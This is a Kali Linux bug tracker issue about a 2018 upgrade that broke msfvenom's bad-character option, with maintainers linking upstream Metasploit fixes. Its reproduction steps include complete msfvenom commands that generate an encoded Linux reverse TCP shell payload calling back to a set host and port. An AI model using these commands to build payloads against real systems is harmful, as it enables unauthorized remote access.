View Issue Details

IDProjectCategoryView StatusLast Update
0004690Kali LinuxKali Package Bugpublic2020-12-01 10:48
Reporteralexander Assigned Tosbrun  
PrioritynormalSeveritymajorReproducibilityalways
Status resolvedResolutionfixed 
Product Version2018.1 
Summary0004690: Latest upgrade of Kali breaks msfvenom's support for bad characters
Description

Linux kali 4.15.0-kali2-686 0000001 SMP Debian 4.15.11-1kali1 (2018-03-21) i686 GNU/Linux

Last dist-upgrade:
9th April 2018

Error message:
/usr/share/metasploit-framework/lib/msf/core/payload/uuid.rb:356:in to_uri': undefined methodencode_base64url' for Rex::Text:Module (NoMethodError)

Steps To Reproduce

Broken:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.0.85 LPORT=443 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai

Works fine:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.0.85 LPORT=443 -f c -e x86/shikata_ga_nai

Activities

alexander

alexander

2018-04-09 20:35

reporter   ~0009013

https://github.com/rapid7/metasploit-framework/issues/9820

g0tmi1k

g0tmi1k

2018-04-10 11:25

administrator   ~0009016

"Addressed in https://github.com/rapid7/metasploit-framework/issues/8200/ / https://github.com/rapid7/metasploit-framework/issues/8210, there are also workarounds there until Kali picks it up."

..Not sure what Kali is meant to pick up?

rhertzog

rhertzog

2018-04-10 20:01

administrator   ~0009024

Kali will pick up the fix when it packages the next release. Usually at the end the week.

alexander

alexander

2018-04-12 09:46

reporter   ~0009032

Seems fixed now with an apt-get upgrade.

Thank you :D!

g0tmi1k

g0tmi1k

2018-04-12 10:48

administrator   ~0009033

4.16.49 is out ~ http://git.kali.org/gitweb/?p=packages/metasploit-framework.git;a=log;h=refs/heads/kali/master

Issue History

Date Modified Username Field Change
2018-04-09 20:33 alexander New Issue
2018-04-09 20:35 alexander Note Added: 0009013
2018-04-10 11:25 g0tmi1k Note Added: 0009016
2018-04-10 20:01 rhertzog Note Added: 0009024
2018-04-12 09:46 alexander Note Added: 0009032
2018-04-12 10:48 g0tmi1k Assigned To => sbrun
2018-04-12 10:48 g0tmi1k Status new => resolved
2018-04-12 10:48 g0tmi1k Resolution open => fixed
2018-04-12 10:48 g0tmi1k Note Added: 0009033
2020-12-01 10:48 g0tmi1k Priority urgent => normal